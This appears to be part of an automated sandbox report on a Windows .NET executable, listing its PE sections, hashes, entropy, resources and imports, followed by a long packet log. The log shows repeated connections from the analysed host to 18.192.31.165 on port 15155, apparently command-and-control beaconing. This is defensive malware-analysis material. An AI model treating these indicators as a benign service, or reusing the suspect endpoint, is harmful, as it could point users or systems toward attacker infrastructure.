add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e0c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x8c34	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe64	0x1000	ef0bb17cd9816d583d9451793c5aff3b	False	0.546142578125	data	5.2499715688397135	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x8c34	0x8e00	896e23cf93eff353b5165e05b2caab9c	False	0.9741967429577465	data	7.911270655840563	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	6de33cb53260a7a1670e9af80a458ba5	False	0.99609375	data	6.456130237620347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x40e8	0x894e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9945376955903271
RT_GROUP_ICON	0xca38	0x14	data	0.9
RT_MANIFEST	0xca4c	0x1e7	XML 1.0 document, ASCII text, with CRLF line terminators	0.5338809034907598

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 06:00:49.324882030 CEST	49675	443	192.168.2.4	173.222.162.32
May 2, 2024 06:00:50.184351921 CEST	49678	443	192.168.2.4	104.46.162.224
May 2, 2024 06:00:58.861835957 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.861896038 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.862066984 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.863715887 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.863751888 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.899552107 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.899616957 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.899671078 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.899941921 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.899954081 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.900332928 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.900372028 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.900548935 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.900718927 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:58.900729895 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:58.935719967 CEST	49675	443	192.168.2.4	173.222.162.32
May 2, 2024 06:00:59.003437042 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.003468990 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.003710985 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.003909111 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.003921986 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.125307083 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.125601053 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.125632048 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.126652956 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.126703978 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.129225016 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.129307032 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.129774094 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.129781008 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.156769991 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.157227993 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.157247066 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.157454967 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.157639027 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.157661915 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.158256054 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.158308029 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.158653021 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.158706903 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.158788919 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.158854008 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.159096003 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.159152985 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.159220934 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.159228086 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.159275055 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.159281969 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.178589106 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.205529928 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.205534935 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.260339022 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.260540009 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.260554075 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.261766911 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.261823893 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.262283087 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.262355089 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.310237885 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.310256004 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.354502916 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.402389050 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.402453899 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.402482033 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.402503967 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.402529001 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.402568102 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.405479908 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.405548096 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.405592918 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.414800882 CEST	49733	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.414814949 CEST	443	49733	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.719950914 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.720062017 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.720124006 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.720145941 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.744165897 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.744232893 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:00:59.744256973 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.744276047 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:00:59.744316101 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:00.974459887 CEST	49735	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:00.974499941 CEST	443	49735	142.251.40.228	192.168.2.4
May 2, 2024 06:01:00.975399971 CEST	49734	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:00.975433111 CEST	443	49734	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.007775068 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.007808924 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.007874012 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.007961035 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.008269072 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.008280993 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.048126936 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.139725924 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.139782906 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.139817953 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.139834881 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.139915943 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.139955044 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.264815092 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.281130075 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.281153917 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.281609058 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.335427999 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.335637093 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.336302042 CEST	49736	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.336333036 CEST	443	49736	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.336879969 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.380124092 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523457050 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523504019 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523530006 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523550034 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.523575068 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523616076 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.523741007 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523789883 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:01.523828983 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.546061993 CEST	49739	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:01.546082020 CEST	443	49739	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.058648109 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:03.058705091 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.058765888 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:03.059171915 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:03.059191942 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.318955898 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.323257923 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:03.323292017 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.323637962 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.326066971 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:03.326132059 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:03.495743036 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:05.839158058 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:05.839196920 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:05.839261055 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:05.842334986 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:05.842359066 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.027708054 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.027782917 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.030467033 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.030474901 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.030744076 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.090948105 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.106583118 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.152118921 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.198895931 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.198976994 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.199033022 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.212423086 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.212450027 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.212461948 CEST	49743	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.212467909 CEST	443	49743	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.282675028 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.282721043 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.282836914 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.283261061 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.283278942 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.462572098 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.462654114 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.467926025 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.467945099 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.468235016 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.469796896 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.512120962 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.638473034 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.638566971 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.638638973 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.639389038 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.639410973 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.639427900 CEST	49744	443	192.168.2.4	104.118.8.139
May 2, 2024 06:01:06.639434099 CEST	443	49744	104.118.8.139	192.168.2.4
May 2, 2024 06:01:06.702059984 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:06.702096939 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:06.702202082 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:06.721477985 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:06.721494913 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:06.907592058 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:06.907672882 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:06.912439108 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:06.912448883 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:06.912750006 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:07.089688063 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:07.103672981 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:07.144128084 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:07.592874050 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:07.593004942 CEST	443	49745	104.20.3.235	192.168.2.4
May 2, 2024 06:01:07.593138933 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:10.711464882 CEST	49745	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:11.723417997 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:11.723472118 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:11.723536015 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:11.724756956 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:11.724771976 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.233544111 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.233659029 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.235876083 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.235888958 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.236135960 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.404566050 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.645186901 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.692123890 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.827508926 CEST	49749	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:12.974555969 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974577904 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974590063 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974621058 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974646091 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974659920 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974716902 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.974740982 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974749088 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974766970 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974767923 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.974782944 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:12.974792004 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.974802017 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.978283882 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:12.995953083 CEST	15155	49749	18.192.31.165	192.168.2.4
May 2, 2024 06:01:13.349869013 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:13.349935055 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:13.349972010 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:13.530364990 CEST	49749	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:13.698995113 CEST	15155	49749	18.192.31.165	192.168.2.4
May 2, 2024 06:01:14.229640007 CEST	49749	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:14.398277998 CEST	15155	49749	18.192.31.165	192.168.2.4
May 2, 2024 06:01:14.417470932 CEST	49742	443	192.168.2.4	142.251.40.228
May 2, 2024 06:01:14.417510033 CEST	443	49742	142.251.40.228	192.168.2.4
May 2, 2024 06:01:14.548432112 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:14.548476934 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:14.548496008 CEST	49746	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:14.548502922 CEST	443	49746	40.68.123.157	192.168.2.4
May 2, 2024 06:01:15.029011965 CEST	49749	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:15.197741985 CEST	15155	49749	18.192.31.165	192.168.2.4
May 2, 2024 06:01:15.729974031 CEST	49749	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:15.898550987 CEST	15155	49749	18.192.31.165	192.168.2.4
May 2, 2024 06:01:15.902739048 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:15.902786970 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:15.902874947 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:15.903325081 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:15.903342009 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:16.086977005 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:16.098288059 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:16.098316908 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:16.316339970 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:16.316471100 CEST	443	49753	104.20.3.235	192.168.2.4
May 2, 2024 06:01:16.316746950 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:16.317111015 CEST	49753	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:18.396539927 CEST	49754	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:18.564136982 CEST	15155	49754	18.192.31.165	192.168.2.4
May 2, 2024 06:01:19.073803902 CEST	49754	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:19.241312981 CEST	15155	49754	18.192.31.165	192.168.2.4
May 2, 2024 06:01:19.745640039 CEST	49754	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:19.913007021 CEST	15155	49754	18.192.31.165	192.168.2.4
May 2, 2024 06:01:20.417563915 CEST	49754	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:20.585091114 CEST	15155	49754	18.192.31.165	192.168.2.4
May 2, 2024 06:01:21.092206001 CEST	49754	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:21.259705067 CEST	15155	49754	18.192.31.165	192.168.2.4
May 2, 2024 06:01:21.260781050 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:21.260828972 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.260926008 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:21.261565924 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:21.261581898 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.444705963 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.446599960 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:21.446625948 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.671592951 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.671727896 CEST	443	49755	104.20.3.235	192.168.2.4
May 2, 2024 06:01:21.671799898 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:21.672481060 CEST	49755	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:23.684184074 CEST	49756	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:23.852761984 CEST	15155	49756	18.192.31.165	192.168.2.4
May 2, 2024 06:01:24.354861021 CEST	49756	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:24.525544882 CEST	15155	49756	18.192.31.165	192.168.2.4
May 2, 2024 06:01:25.026896954 CEST	49756	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:25.195400000 CEST	15155	49756	18.192.31.165	192.168.2.4
May 2, 2024 06:01:25.698854923 CEST	49756	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:25.867386103 CEST	15155	49756	18.192.31.165	192.168.2.4
May 2, 2024 06:01:26.370637894 CEST	49756	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:26.539359093 CEST	15155	49756	18.192.31.165	192.168.2.4
May 2, 2024 06:01:26.540775061 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.540821075 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.540895939 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.541379929 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.541392088 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.724752903 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.780019045 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.837187052 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.837213039 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.950783014 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.950897932 CEST	443	49757	104.20.3.235	192.168.2.4
May 2, 2024 06:01:26.950954914 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:26.951724052 CEST	49757	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:28.966744900 CEST	49758	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:29.136517048 CEST	15155	49758	18.192.31.165	192.168.2.4
May 2, 2024 06:01:29.651757956 CEST	49758	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:29.821578026 CEST	15155	49758	18.192.31.165	192.168.2.4
May 2, 2024 06:01:30.323648930 CEST	49758	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:30.493113041 CEST	15155	49758	18.192.31.165	192.168.2.4
May 2, 2024 06:01:30.993855953 CEST	49758	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:31.163517952 CEST	15155	49758	18.192.31.165	192.168.2.4
May 2, 2024 06:01:31.667653084 CEST	49758	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:31.837614059 CEST	15155	49758	18.192.31.165	192.168.2.4
May 2, 2024 06:01:31.838449955 CEST	49759	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:31.838495970 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:31.838568926 CEST	49759	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:31.838841915 CEST	49759	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:31.838855982 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:32.022049904 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:32.023375988 CEST	49759	443	192.168.2.4	104.20.3.235
